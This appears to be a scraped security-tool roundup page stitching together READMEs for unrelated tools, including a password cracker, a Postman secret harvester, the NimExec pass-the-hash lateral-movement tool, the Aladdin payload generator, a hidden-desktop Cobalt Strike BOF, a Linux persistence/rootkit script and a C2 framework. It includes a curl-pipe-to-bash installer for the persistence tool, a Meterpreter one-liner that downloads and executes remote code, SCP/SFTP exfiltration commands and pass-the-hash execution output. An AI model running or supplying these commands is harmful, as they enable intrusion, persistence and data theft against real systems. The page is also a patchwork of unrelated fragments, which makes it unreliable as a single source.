Brute Force Attack

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
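
Keep the size of the keyspace in mind when choosing these bounds. For the parameters above it is small enough to exhaust quickly, as this quick calculation shows:

# Keyspace for lengths 6-8 over the 6-character set "abc123"
charset_size = len("abc123")
total = sum(charset_size ** length for length in range(6, 9))
print(f"{total:,} candidates")  # 2,006,208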

Password Complexity Evaluation

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
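
PassBreaker's exact complexity criteria are not documented here; a typical filter of this kind might look like the following sketch (the policy below is a hypothetical example):

import re

def is_complex(password: str) -> bool:
    # Hypothetical policy: at least 8 characters with a lowercase letter,
    # an uppercase letter, and a digit
    return (len(password) >= 8
            and bool(re.search(r"[a-z]", password))
            and bool(re.search(r"[A-Z]", password))
            and bool(re.search(r"\d", password)))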

Using Salt Value

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
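
A common salting scheme is to concatenate the salt with each candidate before hashing. PassBreaker's exact scheme may differ, but the idea looks like this:

import hashlib

candidate = "password"
salt = "mysalt123"
# Assumption: the salt is appended after the candidate; other schemes
# prepend the salt or use an HMAC construction instead
salted_hash = hashlib.md5((candidate + salt).encode()).hexdigest()
print(salted_hash)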

Parallel Processing

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

Disclaimer

This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Contributing

Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

License

PassBreaker is released under the MIT License. See LICENSE for more information.



Simple Universal Fortigate Fuzzer Extension Script

This is a small extension script to monitor suff.py, or the Simple Universal Fortigate Fuzzer, and to collect crashlogs for future analysis.

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly evolved into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", in very limited locations, with no consideration for recon beyond secrets. We realized we required capabilities that were "secret-agnostic" and flexible enough to capture false positives that still provide offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities quickly and simply. There are intended workflows and particular keywords that typically maximize results. These methodologies can be found on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments, which can be performed against collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

# The examples in this section assume the package exposes its client class
# as shown below (check the package documentation to confirm)
from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

from porchpirate import porchpirate

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


Nikto Web Scanner 2.5.0

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.



Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the target IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to scan google.com on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name            Support
Metasploit      ✅
Havoc           ❓
Cobalt Strike   ✅
Bruteratel      ✅
Sliver          ✅
DeimosC2        ✅
PhoenixC2       ✅
Empire          ❌
Merlin          ✅
Covenant        ❌
Villain         ✅
Shad0w          ❌
PoshC2          ✅

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the terms set out in the LICENSE file; see LICENSE for details.



NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R


Basically, NimExec is a fileless remote command execution tool that uses the Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target, then restores it, using hand-crafted RPC packets instead of WinAPI calls. It sends these packets over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine, and it completes the NTLM authentication process with hand-crafted packets.

Since all required network packets are crafted manually and no operating-system-specific functions are used, NimExec can be used on different operating systems thanks to Nim's cross-compilation support.

This project was inspired by Julio's SharpNoPSExec tool. You can think of NimExec as a cross-compilable version of SharpNoPSExec with built-in pass-the-hash support. I also learned the required network packet structures from Kevin Robertson's Invoke-SMBExec script.


Compilation

nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname

Usage

test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

[NimExec ASCII-art banner]

@R0h1rr1m


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It has been tested against Windows 10 and 11 and Windows Server 2016, 2019, and 2022, from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                  Enable more verbose output.
    -u | --username <Username>      Username for NTLM authentication.*
    -h | --hash <NTLM Hash>         NTLM password hash for NTLM authentication.*
    -t | --target <Target>          Lateral movement target.*
    -c | --command <Command>        Command to execute.*
    -d | --domain <Domain>          Domain name for NTLM authentication.
    -s | --service <Service Name>   Name of the service to use instead of a random one.
    --help                          Show the help message.

References



GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

Black Hat Arsenal 2024 Next Stop Singapore !

Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

T3SF - Technical Tabletop Exercises Simulation Framework

By: Zion3R


T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL), together with a set of rules defined for each exercise (optional) and a configuration that defines the parameters of the corresponding platform. The main module communicates with a platform-specific module (Discord, Slack, Telegram, etc.) that presents the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organizations, single area" and "multiple organizations, multiple areas".


Getting Things Ready

To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

# Python 3.6+ required
python -m venv .venv # We will create a python virtual environment
source .venv/bin/activate # Let's get inside it

pip install -U pip # Upgrade pip

Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

pip install "T3SF[Discord]"  # Install the framework to work with Discord

or

pip install "T3SF[Slack]"  # Install the framework to work with Slack

This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

Usage

We created this framework to simplify all your work!

Using Docker

Supported Tags

  • slack β†’ This image has all the requirements to perform an exercise in Slack.
  • discord β†’ This image has all the requirements to perform an exercise in Discord.

Using it with Slack

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.
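
A minimal .env for the Slack image might look like the following sketch (the values are placeholders; the variable names are the ones documented above):

SLACK_BOT_TOKEN=xoxb-your-bot-token
SLACK_APP_TOKEN=xapp-your-app-token
MSEL_PATH=/app/MSEL.json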

Using it with Discord

$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


Once you have everything ready, use our template for the main.py, or modify the following code:

Here is an example if you want to run the framework with the Discord bot and a GUI.

from T3SF import T3SF
import asyncio

async def main():
    await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

if __name__ == '__main__':
    asyncio.run(main())

Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

Yes, that simple!

await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

If you need more help, you can always check our documentation here!



Aladdin - Payload Generation Technique That Allows The Deserialization Of A .NET Payload And Execution In Memory

By: Zion3R


Aladdin is a payload generation technique, based on the work of James Forshaw (@tiraniddo), that allows the deserialization of a .NET payload and its execution in memory. The original vector was documented at https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html.

By spawning the process AddInProcess.exe with the arguments /guid:32a91b0f-30cd-4c75-be79-ccbd6345de99 and /pid:, the process starts a named pipe under \\.\pipe\32a91b0f-30cd-4c75-be79-ccbd6345de99 and waits for a .NET Remoting object. If we generate a payload with the appropriate packet bytes required to communicate with a .NET Remoting listener, we can trigger the ActivitySurrogateSelector class from System.Workflow.ComponentModel and gain code execution.


Originally, James Forshaw released a POC at https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData. However, this POC fails on recent versions of Windows, since Microsoft patched the vulnerable System.Workflow.ComponentModel (https://github.com/microsoft/dotnet-framework-early-access/blob/master/release-notes/NET48/dotnet-48-changes.md).

Nick Landers (@monoxgas), however, identified a way to disable the check that Microsoft introduced and wrote a detailed article at https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/. The bypass is documented at pwntester/ysoserial.net#41.

Aladdin is a payload generation tool which, using this bypass together with the necessary header bytes of the .NET Remoting protocol, generates initial access payloads that abuse AddInProcess.exe as originally documented.

The provided templates are:

* HTA

* VBA

* JS

* CHM

Notes

In order for the attack to be successful, the .NET assembly must contain a single public class with an empty constructor to act as the entry point during deserialization. An example assembly is included in the project.

Usage
Usage:
  -w, --scriptType=VALUE    Set to js / hta / vba / chm.
  -o, --output=VALUE        The generated output, e.g.: -o C:\Users\Nettitude\Desktop\payload
  -a, --assembly=VALUE      Provided assembly DLL, e.g.: -a C:\Users\Nettitude\Desktop\popcalc.dll
  -h, --help                Help

OpSec

  • The user-supplied .NET binary will be executed under the AddInProcess.exe that is spawned by the HTA / JS payload. The spawning currently happens via the 9BA05972-F6A8-11CF-A442-00A0C90A8F39 COM object (https://dl.packetstormsecurity.net/papers/general/abusing-objects.pdf), which launches the process as a child of Explorer.exe.

  • The GUID supplied in the process parameters of AddInProcess.exe can be user controlled. At the moment the guid is hardcoded in the template and the code.

  • CHM executes the JScript through XSLT transformation

Defensive Considerations

  • Addinprocess.exe will always launch with /guid and /pid. Baseline your environment for legitimate uses - monitor the rest

Useful References:

* https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html

* https://www.netspi.com/blog/technical/adversary-simulation/re-animating-activitysurrogateselector/

Readme / Credits

Code is based on the following repos:

* https://github.com/tyranid/DeviceGuardBypasses/tree/master/CreateAddInIpcData

* https://github.com/pwntester/ysoserial.net

Shouts to:

  • @m0rv4i for helping with C# nuances
  • @ace0fspad3s for troubleshooting
  • @ Nettitude RT for being awesome


Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

By: Zion3R


WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

It was inspired by ntdiff and made possible with the help of Winbindex.


How It Works

WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations if you need to. See the next section for that.

Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so some PEs' information might be unavailable in WinDiff. However, as soon as those PEs appear on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

How to Build

Prerequisites

  • Rust 1.68 or later
  • Node.js 16.8 or later

Command-Line

The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

# Resolve the project's root folder
PROJECT_ROOT=$(git rev-parse --show-toplevel)

# Generate databases
cd "$PROJECT_ROOT/windiff_cli"
cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

# Build the frontend
cd "$PROJECT_ROOT/windiff_frontend"
npm ci
npm run build

The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R


Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Usage

Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:

hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome

You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]

Demo

Hidden.Desktop.mp4

Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.

Compatibility

The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.

Credits



Proxmark3 4.17511 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed Faraday.

DynastyPersist - A Linux Persistence Tool!

By: Zion3R


  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


Features

  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence (a generic sketch follows this list).

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

Usage

  1. Clone this repository to your local machine:

    git clone https://github.com/Trevohack/DynastyPersist.git
  2. Or use the one-liner:

    curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Support

For support, email spaceshuttle.io.all@gmail.com or join our Discord server.

  • Discord: https://discord.gg/WYzu65Hp

Thank You!



MaccaroniC2 - A PoC Command And Control Framework That Utilizes The Powerful AsyncSSH

By: Zion3R


MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library, which provides an asynchronous client and server implementation of the SSHv2 protocol, and uses the PyNgrok wrapper for ngrok integration. This tool is designed for a specific scenario where the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands from the attacker.

The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more.

Moreover, the attacker can send and execute system commands using a SOCKS proxy, leveraging the benefits offered, for example, using TOR to enhance anonymity.

  • A free Ngrok account only allows one tunnel at a time. With some changes, this tool could be perfect for a BOT-like C&C framework controlling multiple SSH instances, but you would need to upgrade your plan on the Ngrok website; see https://ngrok.com/pricing

Setup and Procedure

  1. Run python3 gen_rsa.py to generate a pair of SSH keys. The newly generated id_rsa is used by the attacker to connect to the server running on the victim's machine.

  2. Edit the asyncssh_server.py file and place the contents of the newly generated id_rsa.pub inside the pub_key variable. The asyncssh_server.py provide an implementation of the SSHv2 protocol with SFTP and SCP features. This is the script run by the victim.

  3. Create a free account on Ngrok site and take note of the AUTH Token.

  4. Add the AUTH token to the token variable in asyncssh_server.py; this needs to be hardcoded inside the ngrok_tunnel() function.

  5. Create a free API key on the Ngrok website. Take note of the generated string.

  6. Put the API key string in the api_key variable inside the async_commander.py file. This allows us to automatically retrieve the Ngrok domain and port of the active tunnel during automation.

  7. Perform the same step for get_endpoints.py file. This script retrieves various useful information about active tunnels.
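
For reference, retrieving the active tunnel's host and port from the Ngrok API, as async_commander.py and get_endpoints.py do, boils down to something like the following sketch (field names per Ngrok's v2 API; verify against the current API documentation):

import requests

API_KEY = "YOUR_NGROK_API_KEY"  # placeholder

resp = requests.get(
    "https://api.ngrok.com/endpoints",
    headers={"Authorization": f"Bearer {API_KEY}", "Ngrok-Version": "2"},
)
resp.raise_for_status()
for endpoint in resp.json().get("endpoints", []):
    # hostport looks like "0.tcp.ngrok.io:12345"
    print(endpoint["proto"], endpoint["hostport"])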

Send commands to server

With async_commander.py you can send any command to the server. It automatically retrieves the domain and port of the Ngrok tunnel activated by the victim, using the official Ngrok API.

Please also note that id_rsa needs to be in the same folder as async_commander.py.

Basic Usage

Run server on victim machine:

python3 asyncssh_server.py


From the attacker machine send command using socks proxy:

python3 asyncssh_commander.py "ls -la" --proxy socks5://127.0.0.1:9050


Send command without using a proxy:

python3 asyncssh_commander.py "whoami"


Spawn another C2 agent (Powershell-Empire, Meterpreter, etc):

python3 asyncssh_commander.py "powershell.exe -e ABJe...dhYte"

Meterpreter web_delivery module

python3 asyncssh_commander.py "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());\""


Get list of active tunnels:

python3 get_endpoints.py


Generate new RSA key pairs:

python3 gen_rsa.py

Advanced Usage

Using SFTP and SCP - you don't need a valid username, just the correct id_rsa:

  • With proxy:

proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path


  • No proxy:

sftp -P PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path


Compiling with Nuitka

python -m pip install nuitka

python -m nuitka --standalone --onefile asyncssh_server.py


Weaponized server

https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py

For further information, check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it’s important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.


